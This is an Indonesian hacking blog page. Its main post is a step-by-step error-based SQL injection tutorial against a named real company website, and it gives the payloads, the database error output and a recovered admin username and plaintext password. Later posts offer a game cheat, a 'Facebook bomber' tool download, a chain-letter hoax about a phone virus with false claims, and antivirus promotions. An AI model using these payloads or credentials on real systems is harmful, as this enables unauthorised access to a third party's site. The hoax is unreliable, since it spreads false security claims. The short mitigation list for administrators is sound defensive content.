Tehnik Hacking dengan SQL Injection ala newbie

Akhir-akhir ini, anda sering mendengar istilah "SQL Injection" ?
Anda tahu betapa berbahaya bug yang satu ini ?
Berikut akan kita sajikan step by step SQL Injection ini.
Catatan : kita akan membatasi bahasan pada SQL Injection
di MS-SQL Server.

Kita akan mengambil contoh di site www.pln-wilkaltim.co.id
Ada dua kelemahan di site ini, yaitu:
1. Tabel News
2. Tabel Admin

Langkah pertama, kita tentukan lubang mana yang bisa di-inject
dengan jalan berjalan-jalan (enumeration) dulu di site tsb.
Kita akan menemukan 2 model cara input parameter, yaitu dengan
cara memasukkan lewat input box dan memasukkannya lewat
alamat URL.

Kita ambil yang termudah dulu, dengan cara input box.
Kemudian kita cari kotak login yang untuk admin.
Ketemu di www.pln-wilkaltim.co.id/sipm/admin/admin.asp
Langkah pertama untuk menentukan nama tabel dan fieldnya,
kita inject kotak NIP dengan perintah (password terserah, cabang
biarkan aja):
' having 1=1--
jangan lupa untuk menuliskan tanda kutip tunggal dan tanda
minus dobel (penting).
Arti kedua tanda tsb bisa anda cari di tutorial SQL Injection
di www.neoteker.or.id ini (lihat arsip sebelumnya).
Kemudian akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NOMOR' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Keluarlah nama field pertama kita !!!
Catat nama tabel : T_ADMIN
Catat nama field : NOMOR

Kemudian kita akan mencari nama field-field berikutnya,
beserta nama tabel yang mungkin berbeda-beda.
Kita inject di kotak NIP (password terserah):
' group by T_ADMIN.NOMOR having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NIP' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya itulah nama tabel dan field kedua kita.
Catat : T_ADMIN.NIP

Kemudian kita cari field ke tiga :
' group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.PASSWORD' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Catat field ke tiga : T_ADMIN.PASSWORD

Lakukan langkah di atas sampai kita menemukan field terakhir.

Berikut adalah pesan error yang terjadi, jika kita mengecek
field terakhir dengan meng-inject:
' group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,
T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ADMIN.EMAIL
having 1=1--
(catatan : kalimat harus 1 baris, tidak dipotong)
--------------------
- NIP atau Password atau Unit Anda salah !! -
--------------------
Sukses !!! Kita berhasil menemukan field terakhir.
Daftar kolom (field):
T_ADMIN.NOMOR
T_ADMIN.NIP
T_ADMIN.PASSWORD
T_ADMIN.NAMA
T_ADMIN.KD_RANTING
T_ADMIN.ADDRESS
T_ADMIN.EMAIL
Hanya ada satu tabel untuk otentifikasi ini (yaitu T_ADMIN),
ini akan mempermudah proses kita selanjutnya.

Langkah berikutnya, kita menentukan jenis struktur field-
field tersebut di atas.

Kita inject di kotak NIP (pass terserah) :
' union select sum(NOMOR) from T_ADMIN--
Arti dari query tersebut adalah : kita coba menerapkan
klausa sum sebelum menentukan apakah jumlah kolom-kolom
di dua rowsets adalah sejenis.
Bahasa mudahnya adalah kita memasukkan klausa sum (jumlah)
yang berlaku untuk type kolom numerik, jadi untuk type kolom
yang bukan numerik, akan keluar error yang bisa memberitahu
kita jenis kolom yang dimaksud.
Pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries
in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.
/sipm/admin/dologin.asp, line 7
--------------------
artinya kolom NOMOR berjenis numerik.

Berikutnya kita inject :
' union select sum(NIP) from T_ADMIN--
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum
or average aggregate operation cannot take a char data
type as an argument.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya kolom NIP bertype char.

Kita harus mengulang perintah di atas untuk kolom yang
berikutnya dengan jalan mengganti nama_kolom di :
' union select sum(nama_kolom) from T_ADMIN--
dengan kolom yang berikutnya.
Kita peroleh 7 type kolom:
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char

Langkah berikutnya, kita akan mencari isi kolom password,
untuk user admin, dengan meng-inject :
' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > 'a'--
artinya kita memilih minimum nama user yang lebih besar dari 'a'
dan mencoba meng-konvert-nya ke tipe integer.
Arti angka 1 sebanyak 6 kali itu adalah bahwa kita hanya memilih
kolom NAMA, dan mengabaikan 6 kolom yang lain.
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the varchar value 'bill ' to
a column of data type int.
/sipm/admin/dologin.asp, line 7
--------------------
Anda lihat :
varchar value 'bill '
'bill' itu adalah nama user di record yang terakhir dimasukkan,
atau isi kolom NAMA di record yang terakhir dimasukkan.

Selanjutnya kita inject :
' union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where
NAMA = 'bill'--
catatan : harus sebaris (tidak dipotong).
Akan keluar error :
---------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the nvarchar value 'm@mpusk@u' to a
column of data type int.
/sipm/admin/dologin.asp, line 7
---------------------
Artinya kita berhasil !!!
Kita dapatkan
[+] NAMA = bill
[+] PASSWORD = m@mpusk@u

Silahkan login ke :
www.pln-wilkaltim.co.id/sipm/admin/admin.asp
dengan account di atas, sedang nama cabang, silahkan anda
isi sendiri dengan cara coba-coba

Atau kita pakai jalan pintas saja....

Kita inject-kan :
' union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN
where NAMA ='bill'--
catatan : harus satu baris.
Duarrrrrr..........
Glhodhak.............
Langsung masuk ke menu admin.
Ingat : jangan buat kerusakan ! beritahu sang admin !!!

Lubang ke dua adalah pada bagian berita.
Pada dasarnya berita di situ adalah isi dari tabel yang
lain lagi. Jadi tetep bisa kita inject !!!
Bedanya, kita harus memasukkan parameter di alamat URL-nya.
Contoh :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2
ada parameter id dan idSM.
Setelah kita coba inject, ternyata yang berpengaruh adalah
parameter id aja (CMIIW).

Kita inject-kan :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119' having 1=1--
akan keluar pesan error :
---------------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'tb_news.NewsId' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/dari_Media.asp, line 58
---------------------------
artinya 'tb_news.NewsId' itulah nama tabel dan kolom kita
yang pertama.

Ulangi langkah-langkah kita di atas sampai didapatkan :
tb_news.NewsId => numeric
tb_news.NewsCatId => numeric
tb_news.EntryDate => datetime
tb_news.Title => nvarchar
tb_news.Content =>
tb_news.FotoLink =>
tb_news.FotoType => bit data
tb_news.review =>
tb_news.sumber => char
tb_news.dateagenda => datetime

Nah, selanjutnya adalah tugas anda sendiri untuk mengembangkan
pengetahuan anda.
Anda bisa men-insert berita yang bisa anda tentukan sendiri
isinya.

Inilah mengapa hole di MS-SQL Server ini demikian berbahaya.

Perkiraan saya, nama-nama partai di situs KPU yang di-hack
oleh Shizoprenic, juga ada di tabel-tabel suatu database,
jadi tetep bisa dimasuki dengan cara SQL Injection ini.


******************************************************
KHUSUS BUAT ADMIN & WEB PROGRAMMER !!!
******************************************************
Cara pencegahan yang umum digunakan :
1. Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula
akan bingung sejenak melihat input box nya gak bisa di
inject dengan perintah yang panjang.
2. Filter input yang dimasukkan oleh user, terutama penggunaan
tanda kutip tunggal (Input Validation).
3. Matikan atau sembunyikan pesan-pesan error yang keluar
dari SQL Server yang berjalan.
4. Matikan fasilitas-fasilitas standar seperti Stored Procedures,
Extended Stored Procedures jika memungkinkan.
5. Ubah "Startup and run SQL Server" menggunakan low privilege user
di SQL Server Security tab.


Yah itulah mungkin yang dapat saya ceritakan.....
Hal itu adalah gambaran, betapa tidak amannya dunia internet...
Kalau mau lebih aman, copot kabel jaringan anda, copot disk
drive anda, copot harddisk anda, jual kompie anda !!!
Just kidding )


Referensi :
[+] sqlinjection, www.BlackAngels.it
[+] anvanced sql injection in sql server applications
(www.ngssoftware.com)
[+] sql injection walktrough (www.securiteam.com)


Read more...

Koneksi lemotdz

maaf blog na gk ke UPDATE"...
coz koneksi w lgi lemot akhir" ini..

T__T




Read more...

Cheat Inject Perfect Patch Juni 2009

Neh w ad Cit Perfect work 99%
NO DC 80%
kga pke HSHIELD HSHIELD an..!!



Cara Guna.in na..
F12 -> Inject perfect
F11 -> Inject Arrow
F5 -> Exit/DC

Dah ah.. w kga mau berbanyak bacot lgi..
langsung sedot ...!!


DOWNLOAD Cit INJECT PERFECT


kalo mau tau password na gampang..!
Buka ni Password Cit Inject Perfect


Read more...

Warning...!!!

PENTING - MOHON DIBACA - JANGAN DIACUHKAN
MOHON BACA PESAN INI - PERINGATAN YANG SANGAT PENTING

Jika anda menerima panggilan telepon dari seseorang dengan no.telp yang
tidak dikenal atau terdaftar, berkata bahwa dia (pria/wanita) berasal
dari divisi engineering/ teknisi perusahaan salah satu vendor/operator
cellphone yang ingin memeriksa sambungan telepon atau sinyal atau
dengan alasan apapun, dan selanjutnya dia berkata bahwa kita harus
menekan tombol # 90 atau #09 atau nomor apapun (bisa juga dengan kode
huruf), secepatnya matikan/putuskan sambungan telepon tersebut tanpa
menekan tombol yang mereka minta. karena saat ini ada penipu-penipu
yang menggunakan peralatan dimana jika anda menekan tombol #90 atau #09
maka penipu-penipu tersebut dapat mengakses SIM card telepon kita dan
mereka dapat menggunakan line anda dengan dan atas biaya anda.

Mohon forward email ini kepada seluruh teman anda untuk mencegah tindak kriminal ini. dan juga ada beberapa issue lainnya.

Jika anda menerima telepon di telepon genggam/cellphone dan layar cellphone anda menampilkan display seperti ini : (XALAN).

JANGAN MENERIMA SAMBUNGAN TELEPON TERSEBUT, HARAP LANGSUNG MATIKAN
TELEPON ANDA DENGAN MENEKAN TOMBOL POWER (ON/OFF) CELLPHONE ANDA..

Karena jika anda menerima sambungan telepon tersebut maka cellphone
anda akan terkena virus. virus ini akan menghapus seluruh IMEI dan
Informasi IMSI dari cellphone dan SIM card anda, dimana selanjutnya
anda akan terputus hubungan sama sekali dari

vendor/operator manapun. (dimana anda harus mengganti cellphone dan SIM
card anda dengan yang baru). Informasi ini telah dikonfirmasi dengan
Motorola and Nokia.. saat ini terdapat lebih dari 3 juta telepon
genggam/cellphone yang terkena Virus ini. anda pun dapat membaca berita
ataupun informasi mengenai hal ini di situs web CNN.

MOHON PESAN INI DAPAT DILANJUTKAN KEPADA TEMAN-TEMAN ANDA.

Kind Regards,
PT Siemens Indonesia
ACCOUNTING
Department

SiemensBusinessPark Building C Level
Jl. M.T. Haryono
Kav.. 58-60
Jakarta12780,
INDONESIAÂ


Read more...

Penipuan yg sangat fatal dari seseorang yg mengaku Hikari

Suatu hari w berkunjung ke blog temen w..
and ternyata w mehliat sdikit hal" ANEGH..
dengan sdikit INDRA DETEKTIF..
w langsung melancarkan misi investigasi... ...

STEP BY STEP.. Look This Picture..



























































KESIMPULAN na : ITU SEMUA BUKAN DARI HIKARI...
ITU ADALAH HIKARI YG PALSU... HARAP TELITI DALAM MENDOWNLOAD SEBUAH FILE...
JGN MUDAH TERMAKAN OMONGAN ORG...
LAKUKAN PENELITIAN SEBELUM MENG-EKSEKUSI FILE TERSEBUT...

Say no to leecher....


By : MR.Sakaw


Read more...

Usb Autorun Virus Remover

Autorun Virus remover memberikan perlindungan terhadap setiap program jahat mencoba untuk menyerang melalui USB drive atau Flashdisk. Ketika USB dimasukkan ke dalam perangkat komputer Anda, Autorun Virus remover akan secara otomatis memindai itu, blok dan menghapus Autorun virus, trojans, dan kode berbahaya. Selain itu, dapat mendeteksi dan menghapus virus USB seperti autorun.inf virus dalam komputer Anda.

Sekarang Anda dapat yakin flashdisk anda dapat terbebas dari virus, trojan horse, worm.

DOWNLOAD USB AUTORUN VIRUS REMOVER

Password na : wedew


Read more...

11 Tools Hacking ala F.B.I



Kemarin w dapat email dari Millist Hacking yang w ikuti, ini ada Tool Hacker yang digunakan oleh FBI untuk menginvestigasi/ melacak para cracker yang melakukan serangan atau tindakan yang merugikan di dunia, w belum coba sich, karena udah malas mau hacking lagi, tapi kalau teman-teman ada yang mau belajar hacking atau mau mencoba hacking silahkan saja untuk mencobanya, tool hacking ini tidak perlu di install karena aplikasinya Portable, bisa di masukkan dalam flashdisk dan dibawa pindah-pindah ke warnet tempat anda main. [ingat jaman dulu kalau hacking pindah2 warnet dan gonta ganti proxy biar kaga ketahuan :p ].

This is a package of 11 useful tools used to investivate the computer, it is used by most of the investigating agency including the FBI to inspect, hack and analyze other computers. For most of the programs, there is no need to install them, they are portable.


This download includes:

- ADS Locator (Alternate Data Streams)
- Disc Investigator 1.4 (File-Slack-Analyze)
- Historian 1.4 (Browser Analyze)
- Live View 0.6 (System Analyze)
- MUI Cacheview 1.00 (Registry Analyze)
- Networkminer 0.85 (Network Analyze)
- Regripper 2.02 (Registry Analyze)
- Systemreport 2.54 (PC Analyze)
- USB-History R1 (USB-Stick-Analyze)
- Windows File Analyzer (File Analyze)
- Winpcap 4.02 (Network

DOWNLOAD 11 Tools FBI

Password na : sakaw.cls

SUMBER : Rozy.Hacker


Read more...

Hidden Ip [Software]

ne w ad 1 lgi program...
kerenz... buat hidden IP kita..
jdi na hacker yg jahat kga isa banned smbrangan IP kita...
n' klo org mau serang jaringan kita.. kita bisa antisipasi dgn menyembunyikan IP..
langsung az sedot..

*DOWNLOAD HERE*


Read more...

FaceBook BOMBER...!!!

negh w ad program "FACEBOOK BOMBER" nyuri dri luar negri... heheheee..
maklum az.. w mantan rampok.. wkwkwkwkwkwk.. ...

w kurang tau juga fungsi na ini utk ap..??
kta Boss yg punya ne program sih buat bom facebook...




hMmm... dri pda di otak bnyak tnda tanya.. ne langsung az sedot...
KLIK DISINI KLO PENGEN DOWNLOAD...

Thx...


Read more...

Smadav 2009 Rev. 4.2



Setelah sekian lama (3 bulan) tidak ada update dari Anvir buatan Mas Zainudin Nafarin, maka secara resmi Smadav 2009 rev 4.2 diluncurkan. Selain perbaikan beberapa bug di versi sebelumnya Smadav Rev. 4.2 baru saja mempunyai satu teknologi baru di dunia antivirus, Smad-Lock, fungsinya untuk mengunci flashdisk Anda sehingga hampir tidak mungkin lagi terinfeksi virus.

Smad-Lock

Flashdisk adalah sumber utama penyebaran virus di Indonesia, sebagian besar kasus infeksi virus di Indonesia berasal dari pertukaran flashdisk dari satu komputer dengan komputer lainnya. Jadi, kalau kita mampu menjaga agar flashdisk tidak terinfeksi virus dari komputer lain maka tentunya komputer kita akan aman dan tidak akan sekali-kali terinfeksi virus. Suatu hal yang sangat fatal adalah kalau komputer kita terinfeksi virus impor (seperti conficker, sality, alman, dll). Berbeda kalau komputer terinfeksi virus lokal yang SEMUANYA mudah dibersihkan, virus impor akan sangat sulit dibersihkan, walaupun bisa dibersihkan tapi tetap saja akan meninggalkan bekas yang merusak.




Jadi, SOLUSI terbaik untuk masalah ini hanya satu, yaitu pencegahan. Hampir semua Virus Lokal & Impor sekarang memanfaatkan flashdisk sebagai sarana penyebarannya, tepatnya dengan membuat file autorun.inf yang diinfeksikan ke flashdisk. Sehingga kalau kita membuka flashdisk tersebut di komputer, virus akan berjalan secara otomatis tepat setelah kita membuka flashdisk. Smad-Lock berhasil membuat flashdisk Anda terkunci HANYA untuk file autorun.inf. Jadi, virus tidak akan mampu membuat file autorun.inf di flashdisk Anda, tentunya setelah flashdisk Anda sudah dikunci oleh Smad-Lock Smadav. Untuk mengaktifkan Smad-Lock Anda, harus mengaktifkan SmaRTP Proteksi Smadav terlebih dahulu. Smad-Lock akan aktif dan mengunci flashdisk Anda otomatis setelah Anda mencolok flashdisk. Jadi, kesimpulannya Smad-Lock telah memutuskan jalur penyebaran virus terbesar di Indonesia.

Tidak hanya sampai disini, setelah Smad-Lock mengunci flashdisk Anda. Smad-Lock juga membuat satu folder di flashdisk Anda, Folder itu bernama Smad-Lock (dengan karakter segitiga bagian kiri dan kanan). Folder Smad-Lock ini adalah folder teraman dari infeksi virus. Virus hampir tidak mungkin dapat memasuki dan menginfeksi folder ini dan semua file di dalamnya. Jadi, semua file yang Anda taruh dalam folder ini SANGAT AMAN dari infeksi virus. Tetapi, Anda tidak boleh me-rename nama folder ini sedikitpun. Folder ini sebaiknya hanya diisi dengan file yang dibuka dengan program buatan microsoft, seperti office (berjenis DOC, XLS, PPT, dan semua file office sejenisnya). Tapi sebenarnya Anda juga dapat mengisi file yang bukan berjenis dokumen office, seperti EXE, ZIP, RAR, tapi sebaiknya ketika Anda membuka file tersebut jangan langsung di dalam folder ini, Anda sebaiknya memindahkan file tersebut keluar folder ini terlebih dahulu sebelum membukanya.

Virus-Virus Baru

Akhir-akhir ini virus lokal mulai kembali mengganas di Indonesia. Virus-virus yang paling banyak menyebar seperti : Nadia Saphira, Yuyun.VBS (Yuyun_Cantix), Legend of Aang. Sebenarnya semua virus ini sudah bisa dideteksi Smadav 2009 Rev. 3 dengan kecerdasan(heuristik)-nya. Tapi, Smadav 2009 Rev 4 jauh lebih kuat untuk memberihkan virus-virus ini sampai ke akar-akarnya, dan semua pembersihan hanya dilakukan sangat cepat, bahkan dalam hitungan detik saja.

Perbaikan dan Penyempurnaan

Smadav 2009 Rev. 4 telah banyak diperbaiki dan disempurnakan sehingga fitur-fiturnya semakin kuat untuk melibas virus. Inilah daftarnya :

[Fitur Tambahan]

* Database dan heuristik virus Smadav mengenal lebih dari 2000 virus
* Selfcheck, pengecekan file Smadav sendiri agar memberi peringatan jika file Smadav rusak atau terinfeksi virus impor.
* Situs upload virus viri.4shared.com menjadi virus4.com
* Ada pemberitahuan otomatis kalau flashdisk yang dicolok bersih dari virus
* Cintai BAHASA, jadi sekarang Smadav sudah mencampurkan Bahasa Indonesia di Programnya

[Perbaikan]

* Start-up pada Windows Vista
* Error -2147467259 ketika membuka Outlook, atau beberapa program lainnya
* Error 462 ketika melakukan restart explorer
* Error 91 ketika shutdown windows
* False Alarm pada beberapa Software : Chrome, Onet, dan beberapa software lainnya
* Gagal menghapus key registry beserta isinya
* Kesalahan setting Folder MyDocument menjadi default
* False Alarm pada Autorun.inf di dalam CD
* Gagal menampilkan otomatis file karantina
* dan banyak perbaikan-perbaikan lainnya

[Penyempurnaan]

* Perombakan tim baru Smadav dengan 4 divisi Webmaster, MoMod, Viser, dan Designer.
* Pengubahan tampilan form about dan donate.
* SmaRT-Protection semakin cepat dan ringan.
* Penambahan label drive pada treeview “pemilihan folder” dalam tab scanning
* Perubahan kata “Missing” menjadi “Hidden” dalam tab scanning
* Mampu membersihkan total virus top baru seperti : Nadia Saphira, Yuyun.VBS, Legend ofaang, Malingsia.D, dll
* Penyempurnaan metode peng-update-an program Smadav
* Dan beberapa penyempurnaan lainnya

*-Download Here-*


Sumber : Dian Ardiansyah


Read more...

  © Free Blogger Templates Nightingale by Ourblogtemplates.com 2008

Back to TOP